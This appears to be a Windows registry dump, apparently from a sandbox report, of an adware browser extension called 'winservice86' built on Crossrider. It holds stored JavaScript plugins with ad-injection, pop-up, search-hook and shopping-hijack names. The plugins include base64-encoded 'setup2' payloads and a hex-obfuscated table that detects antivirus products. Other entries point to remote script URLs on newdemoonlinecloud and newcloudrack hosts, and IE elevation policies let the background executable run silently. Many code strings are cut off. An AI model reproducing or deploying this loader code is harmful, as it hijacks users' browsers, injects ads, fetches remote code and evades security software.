"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\winservice86\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActic"
[HKCU\Software\winservice86\Plugins\345]
"URL" = "http://js.newcloudrack.com/plugins/mins/345.js"
[HKCU\Software\winservice86\Plugins\78]
"Version" = "5"
[HKCU\Software\winservice86\Plugins\93]
"Version" = "13"
[HKCU\Software\winservice86\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"
[HKCU\Software\winservice86\Plugins\195]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/195.js"
[HKCU\Software\winservice86\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"
[HKCU\Software\winservice86\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\winservice86\Plugins\128]
"Version" = "7"
[HKCU\Software\winservice86\Installer]
"AdditionalInfo" = "{""asw"":[0, 1073750528, 0],""browser_name"":""ie""
[HKCU\Software\winservice86\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\winservice86\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\winservice86\Plugins\390]
"URL" = "http://js.newcloudrack.com/plugins/mins/390.js"
[HKCU\Software\winservice86\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\winservice86\Plugins\42]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/42.js"
[HKCU\Software\winservice86\Plugins\14]
"Version" = "11"
[HKCU\Software\winservice86\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\winservice86\Plugins\3]
"Name" = "ie8_fix_2"
[HKCU\Software\winservice86\Plugins\39]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/39.js"
[HKCU\Software\winservice86\Plugins\289]
"Name" = "covus_logos_m"
[HKCU\Software\winservice86\Plugins\354]
"Version" = "2"
[HKCU\Software\winservice86\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var i=(function(){var u={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"
[HKCU\Software\winservice86\Manifest]
"PublisherName" = "Corporate Inc"
"Manifest" = "NA"
"UninstallerOfferUrl" = "NA"
[HKCU\Software\winservice86\Plugins\390]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }"
[HKCU\Software\winservice86\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\winservice86\Plugins\376]
"URL" = "http://js.newcloudrack.com/plugins/mins/376.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\winservice86\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\winservice86\Plugins\180]
"Version" = "12"
[HKCU\Software\winservice86\Plugins\311]
"URL" = "http://js.newcloudrack.com/plugins/mins/311.js"
[HKCU\Software\winservice86\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars1"
[HKCU\Software\winservice86\Plugins\40]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\289]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\winservice86\Plugins\193]
"Version" = "9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\winservice86\Plugins\391]
"URL" = "http://js.newcloudrack.com/plugins/mins/391.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\winservice86\Plugins\380]
"URL" = "http://js.newcloudrack.com/plugins/mins/380.js"
[HKCU\Software\winservice86\Plugins\391]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'bihkugxhrq'); }"
[HKCU\Software\winservice86\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""
[HKCU\Software\Crossrider]
"Bic" = "8D4C23D6A4134239976F389726A57621IE"
[HKCU\Software\winservice86\Plugins\275]
"Name" = "pricedetect_sidebar_small_m"
[HKCU\Software\winservice86\Plugins\47]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/47.js"
[HKCU\Software\winservice86\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\winservice86\Installer]
"Time" = "1456422014"
[HKCU\Software\winservice86\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72""
[HKCU\Software\winservice86\Installer]
"CodeDownloadDomain" = "http://js.newdemoonlinecloud.com"
[HKCU\Software\winservice86\Plugins\311]
"Name" = "dealply_mac_m"
[HKCU\Software\winservice86\Plugins\36]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/36.js"
[HKCU\Software\winservice86\Plugins\102]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/102.js"
[HKCU\Software\winservice86\Manifest]
"ThanksUrl" = "NA"
[HKCU\Software\winservice86\Plugins\311]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\winservice86\Manifest]
"PluginsManifestVersion" = "37"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"AppName" = "winservice86-bg.exe"
[HKCU\Software\winservice86\Plugins\42]
"Version" = "10"
[HKCU\Software\winservice86\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKCU\Software\winservice86\Plugins\424]
"Name" = "sharonl_vid_ws_m"
[HKCU\Software\winservice86\Plugins\269]
"Name" = "stats_ie"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\winservice86\Plugins\47]
"Name" = "resources_background"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\winservice86\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\winservice86\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"
[HKCU\Software\winservice86\Plugins\380]
"Name" = "callcenter_j_m"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"DisplayIcon" = "%Program Files%\winservice86\utils.exe"
[HKCU\Software\winservice86\Plugins\3]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/3.js"
[HKCU\Software\winservice86\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInȱ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"Policy" = "3"
[HKCU\Software\winservice86\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDI"
[HKCU\Software\winservice86\Plugins\104]
"Version" = "12"
[HKCU\Software\winservice86\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\winservice86\Update]
"LastCheck" = "1456422028"
[HKCU\Software\winservice86\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393,399,408,410,413,415,416,418,421,424,437,446,452],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390,396,401,423,436,439,440,450,459],intext:[103,117,123,142,259,263,342,359,360,391,402,442],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389,397,409,411,412,414,419,441,443,444,451,453,457]};"
[HKCU\Software\winservice86\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\winservice86\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\winservice86\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"Bic" = "8D4C23D6A4134239976F389726A57621IE"
[HKCU\Software\winservice86\Plugins\4]
"Version" = "5"
[HKCU\Software\winservice86\Plugins\46]
"Version" = "5"
[HKCU\Software\winservice86\Plugins\275]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'jdawdnmjpf'); }"
[HKCU\Software\winservice86\Plugins\104]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/104.js"
[HKCU\Software\winservice86\Plugins\4]
"URL" = "http://js.newdemoonlinecloud.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\winservice86\Plugins\246]
"Version" = "15"
[HKCU\Software\winservice86\Plugins\273]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/273.js"
[HKCU\Software\winservice86\Plugins\221]
"Version" = "4"
[HKCU\Software\winservice86]
"ActiveAppId" = "64755"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"Policy" = "3"
[HKCU\Software\winservice86\Plugins\246]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/246.js"
[HKCU\Software\winservice86\Plugins\46]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/46.js"
[HKCU\Software\winservice86\Plugins\269]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/269.js"
[HKCU\Software\winservice86\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\winservice86\Plugins\221]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/221.js"
[HKCU\Software\winservice86\Installer]
"StatsDomain" = "http://stats.newdemoonlinecloud.com"
[HKCU\Software\winservice86\Plugins\200]
"Name" = "foxydeal_m"
[HKCU\Software\winservice86\Plugins\45]
"Version" = "4"
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n"
[HKCU\Software\winservice86\Plugins\288]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\winservice86\Installer]
"FullVersion" = "1.35.9.29"
[HKCU\Software\winservice86\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\InstalledBrowserExtensions\17638\Status]
"Installed" = "1"
[HKCU\Software\winservice86\Plugins\223]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/223.js"
[HKCU\Software\winservice86\Manifest]
"DisableIe" = "true"
"RunInFrame" = "false"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"srcid_var" = "002201"
[HKCU\Software\winservice86\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\winservice86\Code]
"NewTabJavaScript" = ""
[HKCU\Software\winservice86\Plugins\263]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"Publisher" = "Corporate Inc"
[HKCU\Software\winservice86\Plugins\39]
"Version" = "5"
[HKCU\Software\winservice86\Manifest]
"PublisherId" = "17638"
[HKCU\Software\winservice86\Plugins\200]
"Version" = "6"
[HKCU\Software\winservice86\Plugins\376]
"Name" = "loaderBackup"
[HKCU\Software\winservice86\Plugins\223]
"Version" = "8"
[HKCU\Software\winservice86\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\winservice86\Plugins\195]
"Version" = "28"
[HKCU\Software\winservice86\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\winservice86\Manifest]
"SetNewTab" = "false"
[HKCU\Software\winservice86\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\winservice86\Plugins\91]
"JavaScript" = "(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==string&&typeof ap.trim==function){return ap.trim();}return ap==null?:ap.toString().replace(/^\s /,).replace(/\s $/,);};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar
[HKCU\Software\winservice86\Plugins\94]
"Version" = "2"
[HKCU\Software\winservice86\Plugins\376]
"JavaScript" = "(function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:10,ni:11,te:19,ch:20,to:26,sb:27,op:28,tc:29,ff:30,tf:39,sf:40,nv:50,ms:51,mf:52,mc:53,np:54,sm:55,fm:56,cm:57,mx:60};var p=source_id;var k=776;var e=__PageActive__;var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime===function)?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:http://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,httpsUrl:https://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,delay:0},{pluginId:242,httpUrl:http://inst.shoppingate.info/js/sg_bg.js?AFFILIATE"
[HKCU\Software\winservice86\Plugins\193]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'fhsakzfpmp'); }"
[HKLM\SOFTWARE\InstalledBrowserExtensions\17638\Status]
"Installed" = "1"
[HKCU\Software\winservice86\Plugins\253]
"URL" = "http://js.newcloudrack.com/plugins/mins/253.js"
[HKCU\Software\winservice86\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"
[HKCU\Software\winservice86\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\winservice86\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\winservice86\Installer]
"zdata" = "0"
